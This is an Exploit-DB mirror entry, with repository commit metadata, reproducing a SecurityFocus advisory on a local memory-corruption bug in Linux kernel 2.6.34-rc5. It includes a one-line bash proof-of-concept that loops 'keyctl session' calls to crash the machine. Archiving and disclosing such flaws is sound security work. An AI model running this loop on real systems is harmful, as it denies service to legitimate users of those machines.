exploit-db-mirror/exploits/linux/dos/33886.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
500 B
Text

source: https://www.securityfocus.com/bid/39719/info
The Linux kernel is prone to a local memory-corruption vulnerability.
Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
kernel 2.6.34-rc5 is vulnerable.
The following proof-of-concept is available:
for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done